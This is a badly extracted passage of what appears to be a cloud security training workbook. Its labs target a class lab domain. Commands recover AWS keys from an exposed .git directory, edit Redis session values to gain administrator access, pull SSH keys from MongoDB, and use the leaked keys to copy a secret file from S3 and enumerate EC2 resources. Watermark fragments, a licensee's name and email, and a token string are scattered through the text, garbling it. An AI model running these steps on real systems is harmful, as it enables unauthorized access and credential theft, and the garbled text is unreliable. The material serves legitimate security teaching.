Walkthrough
n
ce
Li
Getting started
live
As we are doing reconnaissance let's try and get several tools together to attempt to pull down this exposed .git
directory.
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
The rst step would be to use gobuster. Gobuster can be run in 'dir' mode which will allow us to brute force
ljo
directories.
Gregg Harris
au
<p
This presents us with our rst problem, what are common scm directories and sensitive les?
s
rri
Ha
One possible option would have been to open scan1.nmap and look at the top of the text le. Run the
following command:
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
less /home/sec588/files/workdir/scan1.nmap
:
To
d
| http-git: ()
<ip>:80/.git/ ()
live
3e1e3b497543e6c11ac8e4188959c93e
$ cat /home/sec588/files/wordlists/scm.txt
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
This le just contains a small list of entries. Let's now look at our potential hosts:
23169600 ou
tlo
$ cat /home/sec588/files/workdir/dnsrecon.csv | awk -F, '{ print tolower($2) }' | sort -u |
@
grep -v name | grep -v amazonaws > /home/sec588/files/workdir/urls.txt
66
s1
ne
ljo
Gregg Harris
au
<p
This is a very long string, but let's break down what is happening here.
s
rri
Ha
2. We use awk to seperate each area by comma (,) and then we print all the characters lowercase, picking JUST
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
the second area which will be our urls
G
4. Finally we send this list and remove two entries with grep -v, name and amazonaws entries.
5. All of this is sent to /home/sec588/ les/workdir/urls.txt.
d
n se
3e1e3b497543e6c11ac8e4188959c93e
/home/sec588/files/wordlists/scm.txt -o /home/sec588/files/workdir/scm-$URL.txt; done
20
20
This particular script that we see has a few items to take now o , so let's look through this:
,
28
pauljones166@outlook_com
ly
1. We have a for loop in which we are placing into the URL variable whatever is contained in our txt le of urls.
Ju
2. The next section after the do is our gobuster command in which:
>
we use dir (for directory bruteforcing)
om
we use -u passing in whatever item in $URL we are working with now
_c
we are outputting with -o and adding to the end of the lename the $URL we are working on
ok
3. We end any loop with done.
23169600 @
ou
tlo
Once this completes we can see if any les contain any content:
66
s1
$ ls -la /home/sec588/files/workdir
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
$ cat /home/sec588/files/workdir/scm-dev.<class-subdomain>.sec588.net.txt
n
ce
Li
This should reveal that it has a .git directory. Let's go retrieve it.
$ cd /home/sec588/files/workdir
$ cd lab14
3e1e3b497543e6c11ac8e4188959c93e
$ wget --mirror -I .git http://dev.<class-subdomain>.sec588.net/.git/
Now that we have the git directory let's look through it:
20
20
$ cd dev.<class-subdomain>.sec588.net
,
28
pauljones166@outlook_com
ly
$ git log
Ju
>
om
The git log will show you a single commit. This commit may be of interest, considering that the comments have
the words: "Opps, committed the key".
_c
ok
23169600
"Opps" is spelled wrong as well. Unsure what the author may have been thinking when he did that.
@
ou
tlo
Let's review that commit, to do this you need to copy the hash value that is shown next to the word: "commit"
66
s1
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
If we have correctly put in the command at the bottom you will see two entries, more than likely colored in red
with a - in front of them.
-AWS_KEY=
-AWS_SECRET_KEY=
3e1e3b497543e6c11ac8e4188959c93e
Conclusion
In this lab we did a few things, we used Gobuster to comb through hosts in directory bruteforcing format. We
20
have then understood how to loop through a set of hosts passing in directory values. We have downloaded .git
20
exposed repositories. From those directories we are able to retrieve sensitive data. This sensitive data we have
found appears to be AWS keys that we may be able to use.
,
28
pauljones166@outlook_com
ly
If there has been a key exposure issue it is recommended that several steps be taken:
Ju
>
om
1. Revoke the exposed keys
2. Revoke all other keys
_c
3. Use Multi-Factor authentication with Keys when available like in AWS
ok
4. Consistently rotate your keys
23169600 @
ou
tlo
Why This Lab Is Important
66
s1
This particular lab highlights some important issues with the git utility. The system itself is designed to keep a
ne
record of all changes, and as such deleting an incorrectly committed le along is not good enough to wipe out its
ljo
Gregg Harris
contents. Instead you need to completely remove the les using appropriate tools. A tool like BFG Repo-Cleaning
au
(https://rtyley.github.io/bfg-repo-cleaner/) can do this if you follow the process it describes. There are also auditing
<p
tools like gitleaks that will help you nd issues like these and resolve them.
s
rri
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
Expirement with a tool called gitleaks. It can review the git repositories for leaks of other type of key material.
G
We will be looking for our key material in a di erent lab, but if you want a sneakpeak, we recommend running
:
To
this tool.
d
se
20
Exposing Databases and Session Stores to the internet accidently can happen, speci cally when dealing with
rapid deployments in highly dynamic environments. Even if the systems in the environment are not directly
20
exposed to the internet, they could also be accessed from within an environment. This lab will introduce the
,
28
pauljones166@outlook_com
impact of such an issue. We are going to look at the redis database instance that we are running and we are
going to look at the mongodb instance that we are also running. In these two environments we will nd
ly
Ju
mechanisms to control websites and potentially to expose potential problems.
>
om
Requirements for This Lab
_c
ok
connectivity. 23169600 @
ou
tlo
In this lab we will be requiring the SEC588 Virtual Machine to be extracted. It is also going to require internet
66
It is also recommended that Lab 1.2-Lab1.4 is completed so that an understanding of the environment thus far.
s1
ne
Gregg Harris
au
http://wiki.<class-subdomain>.sec588.net
<p
s
rri
Try It Yourself
Ha
gg
Given that we have discovered a MongoDB and Redis exposed database, let's attempt to leverage this tool.
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
3. Log into the redis database environment by using the redis-cli and attempt to modify your role from 'user' to
se
4. Look at the MongoDB environment. The environment is not only enumerable but it can be changed.
Li
live
6. Are there any special items located in the MongoDB instance? We will discover these later.
Walkthrough
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
Gregg Harris
au
$ cd /opt/wiki
Ha
gg
$ sudo ./wiki-updater.sh
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
Based on our script we can see that we are getting a permission denied setting because we don't have the keys.
We will nd some keys potentially in the next few slides.
Let's take a look at the dev site open up Firefox and navigate to http://dev.<class-subdomain>.sec588.net
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
Once the page opens look at the Session ID area and take a note of it. Also take a note of the fact that you have a
ne
user.
ljo
Gregg Harris
au
<p
It also appears that you have a setting for the type of Beer you have.
s
rri
Ha
Please note that what you see in the screenshot will be di erent than what is in class, we may have one entries of
ve entries and the DNS name will be di erent
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 ou
tlo
This particular envionment has a resolution back to the our host. We had previously discovered exposed
database ports for our domain. Let's try and take a look at some of these.
@
66
s1
The redis server can be logged into via telnet, or alternatively we can use the developer and system
ljo
Gregg Harris
administration tools for redis. To do this we would use our redis-cli. We have provided you in the webpage a
au
Recall that we discovered this particular set of hosts through both host
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
live
From the redis-cli type in the command:
<hostname:6379> KEYS *
3e1e3b497543e6c11ac8e4188959c93e
Your keyname will be different
20
We can now set a new value. We can play with values like: administrator.
, 20
<hostname:6379> SET p8hsnhsaagpmk0iudoi6g7qam administrator
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 ou
tlo
We can see if we are a ecting the application by refreshing the page.
@
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
Play with these values, maybe while the rst value may have not given you di erent access, maybe another
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
value will:
: G
To
d
se
root
n
()
ce
Administrator ()
Li
superuser ()
0 ()
admin () live
Each time you set a new key, refresh the page. Once you are satis ed you can type exit or close the shell.
While redis is designed to hold application state or be a session storage location, MongoDB is more of a
Document Object Store that many web applications use as a primary database. Let's attempt to connect to the
3e1e3b497543e6c11ac8e4188959c93e
MongoDB environment since it is not straight forward.
20
20
Once you are inside the mongoshell let's look at the databases that are shown:
,
28
pauljones166@outlook_com
> show databases
ly
Ju
>
Note admin, con g, and local are all standard databases that come with mongo
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
Let's look through the mongo database to see what collections (or think tables) are in the demo database:
s
rri
Ha
> db.getCollectionInfos()
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
The db.getCollectionInfos() will show you the collections that are inside of the demo database.
To
d
n se
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
> db.beers.find().pretty()
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
This will show all the items in the beers collection. There seems to be a correlation. What could be in the other
:
To
collection?
d
se
> db.admin.find().pretty()
n
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
You can use gedit to do this by typing the following command:
20
Paste the entire long string in.
,20
28
pauljones166@outlook_com
Adding our keys into our VM
ly
Ju
From the MATE Terminal we now have a set of SSH Keys we can add to our Lab VM, but there is an exception.
The SSH Client doesn't accept a key that doesn't respect the 64 character per line keysize. Luckily we have a
>
om
simple script that does this. The script is as follows:
_c
ok
#!/bin/bash ()
23169600 @
ou
tlo
rm -Rf /home/sec588/.ssh/sec588-wiki-vm-keys ()
66
-e "s/\S\{64\}/&\n/g"\ ()
Gregg Harris
chmod 400 /home/sec588/.ssh/sec588-wiki-vm-keys ()
au
<p
s
rri
Ha
$ /home/sec588/files/rsajoin/rsajoin.sh
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
Sometimes you see an issue with the RSAJoin where an extra space (or new line) is added before -----END
we recommend editing the le and removing it.
d
live
Once the le is correct you will also need to change the permissions, this will x the keys but they also need to be
committed to the right permissions.
If this works you should be able to update the wiki by typing the following commands:
$ ./wiki-updater.sh
3e1e3b497543e6c11ac8e4188959c93e
Replay of this lab
Conclusion
20
20
In this lab we have discovered an SSH Key burried within an admin key in the MongoDB environment. While this
,
28
is not necessarily always the case, the primary objective of the lab was to demonstrate the dangers of exposing
pauljones166@outlook_com
a Databses to the open internet or alternatively if an attacker has shell access to a server they can discover a
ly
Ju
database that exists already and manipulate an application in runtime.
>
om
We will be exploring these concepts more in a future lab.
_c
ok
Why This Lab Is Important
23169600 ou
tlo
Miscon gurations such as exposing databases into the public cloud can happen quite easily in a rapidly moving
@
cloud system. It is important to understand what the impacts are to such a system.
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
nse
ce
Li
live
20
Brief Intro
, 20
28
pauljones166@outlook_com
Our eyes have the capacity to pick out information visually at times much quicker than we would normally have
ly
given text. It is takes us longer to read through words, and our minds tend to self correct or focus on the wrong
Ju
things. EyeWitness provides us the capability to take screenshots of http pages and then allow us to view them in
>
a single report style page which could yeild us an e ciencies through saving us valuable time. We can also gleen
om
valuable information, maybe a website has lots of javascript and isn't named in a way that we are able to
_c
understand its own functionality. This tool can give us this capability.
ok
Requirements for This Lab 23169600 @
ou
tlo
66
By now you should have found the Wiki and even downloaded it locally to your computer.
ljo
Gregg Harris
au
http://wiki.<class-subdomain>.sec588.net
Ha
Try It Yourself
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
In this particular lab we are going to be taking the sites that we have found and start to catalog them into a
:
To
To do this you will want to create an A/B comparison. To create an A/B comparison we recommend for you to
n
ce
live
$ gedit /home/sec588/files/workdir/ips.txt
$ gedit /home/sec588/files/workdir/urls.txt
3e1e3b497543e6c11ac8e4188959c93e
Walkthrough
20
20
Open a MATE shell and let's re-run dnsrecon.py.
,
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
We are going to follow the process we have been following to obtain ip addresses and hosts names to scan.
n se
ce
$ cd /opt/dnsrecon live
$ ./dnsrecon.py --iw -d <class-subdomain>.sec588.net -D
/home/sec588/files/wordlists/subdomains-5k.txt -t brt,crt -c
/home/sec588/files/workdir/dnsrecon.csv
3e1e3b497543e6c11ac8e4188959c93e
2. Use awk to just pull out the correct sections that are in the csv.
This is the awk command below, you can choose either method you are comfortable with:
20
$ awk -F, '{ print tolower($2) }' /home/sec588/files/workdir/dnsrecon.csv | sort -u | grep -v
20
Name | grep -v amazonaws > /home/sec588/files/workdir/urls.txt
,
28
pauljones166@outlook_com
The reason the command has miltiple pipe operators is to remove the duplicate entries, and remove junk like
ly
Ju
the CSV header of Name and the Amazon AWS CNAME's. Once this is done you can now copy this list into a le
for use with eyewitness. This is what the > does.
>
om
_c
Now we can attempt to do the same with Masscan. We have all of the hostnames, but we also have all the IP's
ok
that are associated with this particular domain. Let's obtain those IP addresses.
23169600 ou
tlo
$ awk -F, '{ print $3 }' /home/sec588/files/workdir/dnsrecon.csv | sort -u | grep -v Address |
@
grep -v '^$' > /home/sec588/files/workdir/ips.txt
66
s1
We now have two lists, one for URL's and one for IP addresses. We can make this one list but let's see what will
ne
Gregg Harris
au
Let's rst get into our EyeWitness Directory, now that we have the prerequisite les. Let's run the rst collection
rri
Ha
of IP's.
gg
$ cd /opt/eyewitness
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
When this is complete it will ask you if you wish to view the report now, enter a "Y" and hit Enter. This will load
n
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
We can see that some pages are indeed avaiable in the system using this method, but this is all subject to
ok
implementation as most systems using the Host: header in HTTP to direct them to their appropriate site. This is
23169600
default amazon page. Let's try and correct this.
@
ou
tlo
what occurs with Amazon S3, and we do not see our websites with the Amazon S3 addresses instead we see the
66
The di erence between both reports will be somewhat evident in that now we are no longer seeing any pages
ljo
that are from the hosting provider. We can understand that its hosted on AWS IP space in many ways and one of
Gregg Harris
au
the more simple ones is to just try the page by IP address. This is just a simple visual indicator that will be
<p
potentially lost using the URL's. There are other markers which we will discuss later like the AMZN header.
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
$ cat categories.txt
What it's doing is gathering a string of texts and placing it in a category by appending a pipe operator '|' and
then the category afterwards. As these sites do not match any text it will not be caterogized.
20
20
As always if you feel that you can contribute to a tool and provide a set of categories back to the author they may
,
accept a pull request like this.
28
pauljones166@outlook_com
ly
Ju
Replay of this lab
>
om
Conclusion
_c
ok
In this lab we have:
23169600
1. Surface reviewed the contents of our exposed systems
@
ou
tlo
2. Viewed the A/B Comparison between these hostnames and IP scanning of these systems
66
s1
We can now continue to review this environment and assess for it any weakeness that we may encounter
ne
ljo
This lab is important because Reconnassaiance, asset discovery, and surface area enumeration are critical
rri
components when it comes to the beginning of understanding how to assess an environment or how to properly
Ha
defend it. We feel that using tools like this provide a great advantage to both red and blue teams.
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
n se
ce
Li
live
20
Brief Intro
,20
28
pauljones166@outlook_com
This lab walks you through using Postman and cURL. The lab serves as both a tour of Postman as well as getting
ly
familiar with cURL. These tools will serve you well as both attackers and defenders as they can provide you with
Ju
an interface into an API system.
>
om
Requirements for This Lab
_c
ok
23169600
will also require two command line tools:
@
ou
tlo
This lab does not require that Section 1 be done, however it would be bene cial to have those URL's available. It
66
Gregg Harris
au
Try It Yourself
<p
s
rri
This lab will demonstrate how to use Postman and the cURL tool for testing both API's and Web applications.
Ha
gg
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
2. Attempt a request with /patch method in cURL and execute a request with the a header of
G
application/json
:
To
live
8. Once this is validated, get the cURL equivlent command and attempt it.
Walkthrough
3e1e3b497543e6c11ac8e4188959c93e
20
20
,
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
$ cd /opt/postman
Ha
gg
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
./Postman
:
To
d
There is an icon on the desktop as well, either one will take a few minutes to open.
nse
ce
Once Postman is open you will presented with the the Postman UI
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
The UI screen can be maixmized to be able to use our screen real-estate. Let's now create a new request. Do
_c
not click on the new button, instead click on the + to open a new tab next to the Launchbar bar.
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
Now we will focus on creating a request that we can work with. To get familiar with tool let's visit httpbin.org
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
http://httpbin.org/
n se
ce
This website is a page with functionality to help you understand how API's tend to work. The website is for you to
Li
learn with, and so there are many options to play with. The entire website is developed with the Swagger API
live
which is a popular API standard with their own API Schema that they published.
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
Click the HTTP Methods Button on the page to open the Swagger API calls that are supported.
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
nse
We see that we a large number of methods that are supported with this set of calls, each one of these methods
ce
DELETE, GET, PATCH, POST for this example is hosted in the paths with the same name. So you can call DELETE
Li
on the /DELETE route, you can call GET in the /GET route and so on and so on.
live
Let us now con gure Postman to play with some of these, let's open PATCH.
First click on the PATCH area to open the Swagger capability to perform the action for yourself.
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
Now some of the items that we will want to focus in on is the fact that this request when executed, will be with
pauljones166@outlook_com
the application/json request type, not the typical text/html request. By clicking the word execute it will
ly
Ju
execute the command in the browser.
>
om
The execute command will only show up after you click 'Try it out'
_c
ok
23169600 @
ou
tlo
66
s1
ne
Look at the output, we see a few items. First the cURL equivalent to execute the command, secondly we see the
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
If you wish to make a note of the cURL command you can, this guide will replicate the command for you. It is:
Gregg Harris
au
<p
Open Postman and in the request window, in the method area switch the method from GET to PATCH, in the URL
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
put http://httpbin.org/patch . Hit the send button to get a response.
: G
To
d
nse
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
We can inspect the response in the response body. You can see the origin and some of the other output its in it's
23169600 tlo
format. Let's now play around with environments. In the upper right hand corner click the eyeball.
@
ou
Click the add`` button, if you have an existing environment the button will say edit . Name the
66
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
se
Under variable put in the word method for the initial value enter patch , in the current value enter patch .
n
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
Interface. 23169600 @
ou
tlo
Click update and then hit add and do this all over again. There is a bug in this version of the User
Once you see in the list of environments hit the X in the corner of this area to close it.
66
Select the drop down in the environment to choose Lab 2.1 Temporary as the environment.
ljo
Gregg Harris
au
In the URL of the request remove the word patch and replace it with {{method}} as is shown in the
<p
screenshot below.
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
nse
ce
We have now created a variable that we can change over time. Let's now make this API do some additonal
Li
things. One of the common items we may have to deal with is Authorization. The httpbin.org website does allow
live
us to attempt a basic authentication. Let's setup basic authentication with Postman
Lets rst setup our environment for reusability. Click back into the environment window using the eyeball, and
click 'edit'. Change the methods from the current vaue being patch to get. Set a new value
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
username sec588
ne
ljo
Gregg Harris
au
<p
http://httpbin.org/basic-auth/{{username}}/{{password}}
gg
Next in the method change it to a GET request. Finally change the Authorization to Basic Auth. Set the username
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
to and password {{password}} .
G
{{username}}
:
To
d
nse
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
This will present you with a menu that has the dropdown for di erent languages. Find the 'curl one' as shown
below.
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
Copy the curl command, once it is copied, open a MATE terminal and paste the curl command in.
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
live
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
Replay of this lab
ly
Ju
>
Why This Lab Is Important
om
_c
We will be using postman to simulate requests to API's through our labs, learning how postman works will be a
ok
critical utility to be able to build an automate attacks. Sometimes developer tools, tend to be very powerful
23169600 tlo
attack tools, we need to embrace these tools as they may be available ahead of our attack tools wrapper.
@
ou
66
Additional Resources
s1
ne
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
nse
ce
Li
live
20
Brief Intro
, 20
28
pauljones166@outlook_com
We are currently in our Mapping section where we are looking at how to be more e ecient when we map out
ly
networks, applications, and services.
Ju
>
Throughout this course you will be interacting with many of Amazon Web Services API's. The simplest way to
om
facilitate access to the AWS API, outside of a tool that may constain some of the API while automating other
_c
parts is to be familiar with the API itself. The easiest way to become intimately familiar is with the use of the
ok
Amazon AWS CLI tool. In this lab we will start to work with the tool, including con guring a key by hand, working
23169600
with lters and queries and iterating through sets of data. @
ou
tlo
We discovered an AWS Key string potentially in our Day 1 Lab 4 exersize. Let's see if we can actually attempt to
66
use those particular keys to our advantage. Perhaps these keys have elevated privileges, or perhaps they can
s1
This lab would require you have completed all of the Day1 exercises, however we will be reviewing many of the
rri
topics in the prerequisite sections. This lab does require connectivity to our AWS Environment.
Ha
gg
It will also require that we have our AWS tools in our vm installed, you can check this by typing the following
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
commands in the cli and looking for the aws help message:
: G
To
$ aws
d
n se
Try It Yourself
ce
Li
live
In the previous day in Lab 1.4 we found what appeared to be Amazon Web Services API Keys. In this lab we will
be looking at the API keys.
1. Con gure a pro le using the keys with the name lab22
2. List out all of the contents within the s3 bucket of pictures..sec588.net
3. Try and see if you have permissions to read all s3 buckets
3e1e3b497543e6c11ac8e4188959c93e
Walkthrough
20
Con guration of AWS Pro les
,20
28
Let's open a MATE terminal to con gure the appropriate pro le in AWS:
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
se
live
Let's ll in the information with what we have had presented to us. In Lab 1.4 we found API keys in a git commit of
a .env le. Let's open those up and answer the questions in con gure:
3e1e3b497543e6c11ac8e4188959c93e
We have provided an example screenshot below:
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
Let's test to see what permissions we have, rst you can see what the tool supports by using the help
<p
commands:
s
rri
Ha
$ aws help
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
$ aws s3 help
:G
To
We have provided you some commands to try, now we understand that we haven't provided you with a ton of
d
context on the tool, and that will be comming here in a minute, but let's play with the AWS CLI to understand the
se
options.
n
ce
Li
$ aws s3 ls live
3e1e3b497543e6c11ac8e4188959c93e
But why? We need to pass it the appropriate pro le to use and to ensure we highlight this critical feature we
wanted to display what happens without the command.
20
20
$ aws s3 ls s3://pictures.<class-subdomain>.sec588.net --profile lab22
,
28
pauljones166@outlook_com
We are going to provide you a s3url that you can use to explore, speci cally we will provide you with the images
ly
Ju
s3 bucket. You can also copy anything you wish out of this s3 bucket, it can be any le in here. Speci cally lets
take our raven picture and the secretdata.txt le.
>
om
_c
$ aws s3 cp --profile lab22 s3://pictures.<class-subdomain>.sec588.net/raven.png
ok
/home/sec588/files/workdir/raven.png
23169600 ou
tlo
$ aws s3 cp --profile lab22 s3://pictures.<class-subdomain>.sec588.net/secretdata.txt
@
/home/sec588/files/workdir/secretdata.txt
66
s1
ne
ljo
Gregg Harris
au
The speci c IAM Access Control entry we have is for s3:Get* which would allow us to get buckets. We may
rri
also be able to perform speci c s3 operations if the s3 bucket policy is not restrictive. Now let's try and list all
Ha
buckets.
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
$ aws s3 ls --profile lab22
: G
To
This yields us a permissions denied setting, let's see what else we may be able to do. To see what user this
d
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
You can see the use will be the bob- user. We will try one more thing let's place with enumerating all the public IP
ok
23169600
addresses like we described in an earlier slide:
@
ou
tlo
The commands after jq are case sensitive ensure you have the proper casing!
66
.PublicIpAddress'
ne
ljo
Gregg Harris
While this command above provides the details of the IP addresses we need to do some work to get the security
au
group tied to those addresses. Let's play around with some of the commands to see what exactly happens when
<p
The rst step is to play with the string interpolation feature of jq to be able to pull out the instance ID and the Ip
Address, these are both contained in the same place:
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
\(.PublicIpAddress)"'
d
n se
ce
Li
3e1e3b497543e6c11ac8e4188959c93e
for SG in `aws ec2 describe-instances --profile lab22 | jq '.Reservations[] | .Instances[] |
.NetworkInterfaces[] | .Groups[] | .GroupId' | tr -d '"'`; do echo $SG; done
20
This command prints it out, let's append each one of the commands to the end of describe-security-group
20
method:
,
28
pauljones166@outlook_com
for SG in `aws ec2 describe-instances --profile lab22 | jq '.Reservations[] | .Instances[] |
ly
Ju
.NetworkInterfaces[] | .Groups[] | .GroupId' | tr -d '"'`; do echo $SG; aws ec2 describe-
security-groups --profile lab22 --group-ids $SG | jq ' .SecurityGroups[] | .IpPermissions[] |
>
om
.ToPort'; echo "===="; done
_c
ok
23169600 @
ou
tlo
66
s1
ne
Gregg Harris
au
Now that we understand what we can do with the AWS CLI, let's use the CLI toolkit's power to start exploring the
Ha
infrastructure permissions of the system. AWS has a very powerful permissions model, but with it's age it has
gg
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
20
Brief Intro
, 20
28
pauljones166@outlook_com
This lab introduces you to the usefulness of extremely large and relevant wordlists.
ly
Ju
>
The wordlists used in this lab have been created using a speci c set of queries against publicly available datasets
om
at google.
_c
ok
you can and you will need:
23169600 @
ou
tlo
The author of this course has decided not to have the students RUN the commands instead, he just shown you
the commands below which had been used ot create the wordlists in this class. If you wish to do this after class
66
s1
2. About $20 - $25 to run the queries in the Big Table database
ljo
Gregg Harris
au
rails-routes.txt
rri
Ha
~/.config/gcloud/application_default_credentials.json subdomains
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
/home/sec588/files/wordlists
To
d
se
What does the rst command do? It leverages a public set of data sets 43
n
ce
During this lab you will nd and uncover new applications, hosts and resources that will be used throughout the
Li
live
labs today. Similar to the rst day, this will be a cloud based treasure hunt. Your goal will be to nd the
applications that allow us to:
1. Post text
2. Post a comment to that text
3. Any additional resources that are related
3e1e3b497543e6c11ac8e4188959c93e
$ head -10000 subdomains.txt > subdomains-10k.txt
20
We will only be using the -5k.txt and -10k based wordlists.
, 20
28
pauljones166@outlook_com
Requirements for This Lab
ly
Ju
In this lab we will be requiring connectivity to our lab environment.
>
om
_c
Try It Yourself
ok
23169600 tlo
To attempt this lab yourself you will need a few bits of information:
@
ou
1. Find the blog site using
66
/opt/gobuster
2. The gobuster command for nding the hosts will be dns , the wordlist for this is going to be the wordlist
s1
files/wordlists
3. Find the hidden api url's in the blog site using the /opt/gobuster , you will need to use the option.
ljo
dir
4. The wordlist for this is in the
Gregg Harris in the directory
au
rails-routes-5k.txt files/wordlists
5. The command line options that are needed is to use the at 100, run the system in
<p
threads quiet
mode
s
rri
6. Once you have located the blog, attempt to delete a post, you will not be able to, try and delete it by using
Ha
Walkthrough
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
Getting started
d
se
We are going to be using gobuster to work through this our wordlist in a very quick and e cient way.
n
ce
Commonspeak2 wordlists can be in the 1M+ range, but working through a 1M+ wordlist would be a very
Li
live
We will start by open a MATE terminal if one is not already opened:
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
Gregg Harris
au
<p
cd /home/sec588/files/wordlists
s
rri
If you we list out the directory ls we should see several les with their corresponding 'commonspeak2'
Ha
category:
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
rails-routes , subdomains , and scm
: G
To
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
